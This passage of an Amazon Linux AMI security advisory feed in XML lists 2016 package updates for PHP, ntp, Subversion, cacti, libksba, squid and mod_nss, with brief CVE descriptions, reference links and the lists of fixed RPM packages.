The phar_make_dirstream function in ext/phar/dirstream.c in PHP before 5.6.18 and 7.x before 7.0.3 mishandles zero-size ././@LongLink files, which allows remote attackers to cause a denial of service (uninitialized pointer dereference) or possibly have unspecified other impact via a crafted TAR archive.
1332454:
CVE-2016-4343 php: Uninitialized pointer in phar_make_dirstream()
CVE-2013-7456:
1340433:
CVE-2013-7456 gd, php: Out-of-bounds read in imagescale
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7456" title="" id="CVE-2013-7456" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4343" title="" id="CVE-2016-4343" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5093" title="" id="CVE-2016-5093" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5094" title="" id="CVE-2016-5094" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5095" title="" id="CVE-2016-5095" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5096" title="" id="CVE-2016-5096" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-xmlrpc" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.36" release="1.115.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php55-odbc-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package 
name="php55-opcache" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.36" release="1.115.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php55-tidy-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.36" 
release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-devel" 
version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.36-1.115.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.36" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.36-1.115.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-708</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-708: medium priority package update for ntp</title><issued date="2016-06-02 18:06:00" /><updated date="2016-06-03 19:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-2518:
An out-of-bounds access flaw was found in the way ntpd processed certain packets. An authenticated attacker could use a crafted packet to create a peer association with hmode of 7 and larger, which could potentially (although highly unlikely) cause ntpd to crash.
1331468:
CVE-2016-2518 ntp: out-of-bounds references on crafted packet
CVE-2016-2516:
1331466:
CVE-2016-2516 ntp: assertion failure in ntpd on duplicate IPs on unconfig directives
CVE-2016-1550:
A flaw was found in the way NTP&#039;s libntp performed message authentication. An attacker able to observe the timing of the comparison function used in packet authentication could potentially use this flaw to recover the message digest.
1331464:
CVE-2016-1550 ntp: libntp message digest disclosure
CVE-2016-1548:
It was found that an ntpd client could be forced to change from basic client/server mode to the interleaved symmetric mode. A remote attacker could use a spoofed packet that, when processed by an ntpd client, would cause that client to reject all future legitimate server responses, effectively disabling time synchronization on that client.
1331462:
CVE-2016-1548 ntp: ntpd switching to interleaved mode with spoofed packets
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1548" title="" id="CVE-2016-1548" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1550" title="" id="CVE-2016-1550" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2516" title="" id="CVE-2016-2516" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2518" title="" id="CVE-2016-2518" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ntp-doc" version="4.2.6p5" release="40.30.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-doc-4.2.6p5-40.30.amzn1.noarch.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="40.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-debuginfo-4.2.6p5-40.30.amzn1.x86_64.rpm</filename></package><package name="ntp" version="4.2.6p5" release="40.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-4.2.6p5-40.30.amzn1.x86_64.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="40.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntpdate-4.2.6p5-40.30.amzn1.x86_64.rpm</filename></package><package name="ntp-perl" version="4.2.6p5" release="40.30.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-perl-4.2.6p5-40.30.amzn1.noarch.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="40.30.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-debuginfo-4.2.6p5-40.30.amzn1.i686.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="40.30.amzn1" epoch="0" arch="i686"><filename>Packages/ntpdate-4.2.6p5-40.30.amzn1.i686.rpm</filename></package><package name="ntp" version="4.2.6p5" release="40.30.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-4.2.6p5-40.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" 
author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-709</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-709: medium priority package update for subversion</title><issued date="2016-06-02 18:08:00" /><updated date="2016-06-03 19:46:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-2168:
The req_check_access function in the mod_authz_svn module in the httpd server in Apache Subversion before 1.8.16 and 1.9.x before 1.9.4 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a crafted header in a (1) MOVE or (2) COPY request, involving an authorization check.
1331683:
CVE-2016-2168 subversion: DoS in mod_authz_svn during COPY/MOVE authorization check
CVE-2016-2167:
The canonicalize_username function in svnserve/cyrus_auth.c in Apache Subversion before 1.8.16 and 1.9.x before 1.9.4, when Cyrus SASL authentication is used, allows remote attackers to authenticate and bypass intended access restrictions via a realm string that is a prefix of an expected repository realm string.
1331686:
CVE-2016-2167 subversion: svnserve/sasl may authenticate users using the wrong realm
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2167" title="" id="CVE-2016-2167" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2168" title="" id="CVE-2016-2168" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="subversion-python27" version="1.9.4" release="2.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python27-1.9.4-2.54.amzn1.x86_64.rpm</filename></package><package name="subversion-ruby" version="1.9.4" release="2.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-ruby-1.9.4-2.54.amzn1.x86_64.rpm</filename></package><package name="subversion-tools" version="1.9.4" release="2.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-tools-1.9.4-2.54.amzn1.x86_64.rpm</filename></package><package name="subversion-debuginfo" version="1.9.4" release="2.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-debuginfo-1.9.4-2.54.amzn1.x86_64.rpm</filename></package><package name="subversion" version="1.9.4" release="2.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-1.9.4-2.54.amzn1.x86_64.rpm</filename></package><package name="subversion-perl" version="1.9.4" release="2.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-perl-1.9.4-2.54.amzn1.x86_64.rpm</filename></package><package name="subversion-javahl" version="1.9.4" release="2.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-javahl-1.9.4-2.54.amzn1.x86_64.rpm</filename></package><package name="subversion-devel" version="1.9.4" release="2.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-devel-1.9.4-2.54.amzn1.x86_64.rpm</filename></package><package name="subversion-libs" version="1.9.4" release="2.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-libs-1.9.4-2.54.amzn1.x86_64.rpm</filename></package><package name="subversion-python26" 
version="1.9.4" release="2.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python26-1.9.4-2.54.amzn1.x86_64.rpm</filename></package><package name="mod24_dav_svn" version="1.9.4" release="2.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_dav_svn-1.9.4-2.54.amzn1.x86_64.rpm</filename></package><package name="subversion-perl" version="1.9.4" release="2.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-perl-1.9.4-2.54.amzn1.i686.rpm</filename></package><package name="subversion" version="1.9.4" release="2.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-1.9.4-2.54.amzn1.i686.rpm</filename></package><package name="subversion-javahl" version="1.9.4" release="2.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-javahl-1.9.4-2.54.amzn1.i686.rpm</filename></package><package name="subversion-devel" version="1.9.4" release="2.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-devel-1.9.4-2.54.amzn1.i686.rpm</filename></package><package name="subversion-python26" version="1.9.4" release="2.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python26-1.9.4-2.54.amzn1.i686.rpm</filename></package><package name="subversion-tools" version="1.9.4" release="2.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-tools-1.9.4-2.54.amzn1.i686.rpm</filename></package><package name="subversion-ruby" version="1.9.4" release="2.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-ruby-1.9.4-2.54.amzn1.i686.rpm</filename></package><package name="subversion-debuginfo" version="1.9.4" release="2.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-debuginfo-1.9.4-2.54.amzn1.i686.rpm</filename></package><package name="mod24_dav_svn" version="1.9.4" release="2.54.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_dav_svn-1.9.4-2.54.amzn1.i686.rpm</filename></package><package name="subversion-python27" version="1.9.4" release="2.54.amzn1" epoch="0" 
arch="i686"><filename>Packages/subversion-python27-1.9.4-2.54.amzn1.i686.rpm</filename></package><package name="subversion-libs" version="1.9.4" release="2.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-libs-1.9.4-2.54.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-710</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-710: medium priority package update for mod_dav_svn</title><issued date="2016-06-02 18:09:00" /><updated date="2016-06-03 19:46:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-2168:
The req_check_access function in the mod_authz_svn module in the httpd server in Apache Subversion before 1.8.16 and 1.9.x before 1.9.4 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a crafted header in a (1) MOVE or (2) COPY request, involving an authorization check.
1331683:
CVE-2016-2168 subversion: DoS in mod_authz_svn during COPY/MOVE authorization check
CVE-2016-2167:
The canonicalize_username function in svnserve/cyrus_auth.c in Apache Subversion before 1.8.16 and 1.9.x before 1.9.4, when Cyrus SASL authentication is used, allows remote attackers to authenticate and bypass intended access restrictions via a realm string that is a prefix of an expected repository realm string.
1331686:
CVE-2016-2167 subversion: svnserve/sasl may authenticate users using the wrong realm
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2167" title="" id="CVE-2016-2167" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2168" title="" id="CVE-2016-2168" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod_dav_svn" version="1.9.4" release="2.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-1.9.4-2.52.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn-debuginfo" version="1.9.4" release="2.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-debuginfo-1.9.4-2.52.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn-debuginfo" version="1.9.4" release="2.52.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-debuginfo-1.9.4-2.52.amzn1.i686.rpm</filename></package><package name="mod_dav_svn" version="1.9.4" release="2.52.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-1.9.4-2.52.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-711</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-711: medium priority package update for cacti</title><issued date="2016-06-02 18:14:00" /><updated date="2016-06-03 20:10:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3659:
SQL injection vulnerability in graph_view.php
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3659" title="" id="CVE-2016-3659" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cacti" version="0.8.8h" release="1.13.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-0.8.8h-1.13.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-712</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-712: medium priority package update for libksba</title><issued date="2016-06-02 18:19:00" /><updated date="2016-06-03 19:56:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-4579:
1335396:
CVE-2016-4579 libksba: Out-of-bounds read in _ksba_ber_parse_tl
CVE-2016-4574:
1334831:
CVE-2016-4574 libksba: Incomplete fix for CVE-2016-4356
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4574" title="" id="CVE-2016-4574" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4579" title="" id="CVE-2016-4579" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libksba-devel" version="1.3.4" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libksba-devel-1.3.4-1.8.amzn1.x86_64.rpm</filename></package><package name="libksba-debuginfo" version="1.3.4" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libksba-debuginfo-1.3.4-1.8.amzn1.x86_64.rpm</filename></package><package name="libksba" version="1.3.4" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libksba-1.3.4-1.8.amzn1.x86_64.rpm</filename></package><package name="libksba" version="1.3.4" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libksba-1.3.4-1.8.amzn1.i686.rpm</filename></package><package name="libksba-devel" version="1.3.4" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libksba-devel-1.3.4-1.8.amzn1.i686.rpm</filename></package><package name="libksba-debuginfo" version="1.3.4" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libksba-debuginfo-1.3.4-1.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-713</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-713: medium priority package update for squid</title><issued date="2016-06-15 13:30:00" /><updated date="2016-06-15 13:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-4556:
* An incorrect reference counting flaw was found in the way Squid processes ESI responses. If Squid is configured as a reverse proxy or for TLS/HTTPS interception, an attacker controlling a server accessed by Squid could crash the Squid worker, causing a Denial of Service attack.
CVE-2016-4554:
* An input validation flaw was found in Squid's mime_get_header_field() function, which is used to search for headers within HTTP requests. An attacker could send an HTTP request from the client side with a specially crafted Host header that bypasses same-origin security protections, causing Squid operating as an interception or reverse proxy to contact the wrong origin server. It could also be used for cache poisoning for clients not following RFC 7230.
CVE-2016-4054:
* Buffer overflow and input validation flaws were found in the way Squid processed ESI responses. If Squid was used as a reverse proxy, or for TLS/HTTPS interception, a remote attacker able to control ESI components on an HTTP server could use these flaws to crash Squid, disclose parts of the stack memory, or possibly execute arbitrary code as the user running Squid.
CVE-2016-4053:
* Buffer overflow and input validation flaws were found in the way Squid processed ESI responses. If Squid was used as a reverse proxy, or for TLS/HTTPS interception, a remote attacker able to control ESI components on an HTTP server could use these flaws to crash Squid, disclose parts of the stack memory, or possibly execute arbitrary code as the user running Squid.
CVE-2016-4052:
* Buffer overflow and input validation flaws were found in the way Squid processed ESI responses. If Squid was used as a reverse proxy, or for TLS/HTTPS interception, a remote attacker able to control ESI components on an HTTP server could use these flaws to crash Squid, disclose parts of the stack memory, or possibly execute arbitrary code as the user running Squid.
CVE-2016-4051:
* A buffer overflow flaw was found in the way the Squid cachemgr.cgi utility processed remotely relayed Squid input. When the CGI interface utility is used, a remote attacker could possibly use this flaw to execute arbitrary code.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4051" title="" id="CVE-2016-4051" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4052" title="" id="CVE-2016-4052" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4053" title="" id="CVE-2016-4053" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4054" title="" id="CVE-2016-4054" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4554" title="" id="CVE-2016-4554" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4556" title="" id="CVE-2016-4556" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2016:1138.html" title="" id="RHSA-2016:1138" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid-debuginfo" version="3.1.23" release="16.21.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.1.23-16.21.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.1.23" release="16.21.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.1.23-16.21.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.1.23" release="16.21.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.1.23-16.21.amzn1.i686.rpm</filename></package><package name="squid" version="3.1.23" release="16.21.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.1.23-16.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-714</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-714: low priority package update for mod24_nss</title><issued date="2016-06-15 13:30:00" /><updated date="2016-06-15 13:30:00" 
/><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3099:
1319052:
CVE-2016-3099 mod_nss: Invalid handling of +CIPHER operator
